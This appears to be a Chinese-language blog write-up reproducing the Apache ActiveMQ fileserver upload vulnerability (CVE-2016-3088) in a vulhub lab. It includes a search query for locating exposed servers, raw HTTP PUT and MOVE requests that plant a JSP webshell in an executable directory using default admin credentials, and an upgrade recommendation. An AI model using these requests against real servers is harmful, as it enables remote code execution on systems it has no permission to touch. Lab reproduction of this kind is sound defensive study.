【漏洞复现】ActiveMQ文件上传漏洞(CVE-2016-3088)

Nx01 产品简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。

Nx02 漏洞描述

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。

Nx03 产品主页

hunter-query: web.title="Apache ActiveMQ"

Nx04 漏洞复现

1.vulhub启动靶场。

2.确定当前系统路径/admin/test/systemProperties.jsp

3.上传webshell 返回204 fileserver 路径下不解析。

复制代码
PUT /fileserver/2.txt HTTP/1.1
Host: {{Hostname}}
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 397

<%@ page import="java.io.*" %>

4.移动webshell到可解析目录api下。

复制代码
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=1xg7iymt54sps2nswn18zrh7h
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cache-Control: max-age=0

5.访问/api/s.jsp执行命令。

Nx05 修复建议

ActiveMQ Fileserver的功能在5.14.0及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

相关推荐
dalerkd11 小时前
忙里偷闲叙-谈谈最近两年
网络·安全·web安全
菩提小狗14 小时前
Sqlmap双击运行脚本,双击直接打开。
前端·笔记·安全·web安全
菩提小狗19 小时前
SQL注入之sqlmap|web安全|渗透测试|网络安全
数据库·sql·web安全
zhengfei61120 小时前
【Slack 安全工具箱】—— 多维度一体化安全管理平台
网络·安全·web安全
菩提小狗20 小时前
sqlmap输入命令回车自动退出故障排查
笔记·安全·web安全
军哥系统集成号21 小时前
2026网络安全法修订落地:企业六类法定强制评估合规指南(附协同实施路径)
网络·安全·web安全
晓幂1 天前
【2025】HECTF
笔记·学习·web安全
上海云盾-高防顾问1 天前
中小企业低成本渗透测试实操指南
网络协议·web安全·网络安全
Bug.ink2 天前
BUUCTF——WEB(7)
web安全·网络安全·buuctf
安全渗透Hacker2 天前
参数未校验导致的DOS(服务拒绝)问题典型场景
java·安全·web安全·网络安全·安全性测试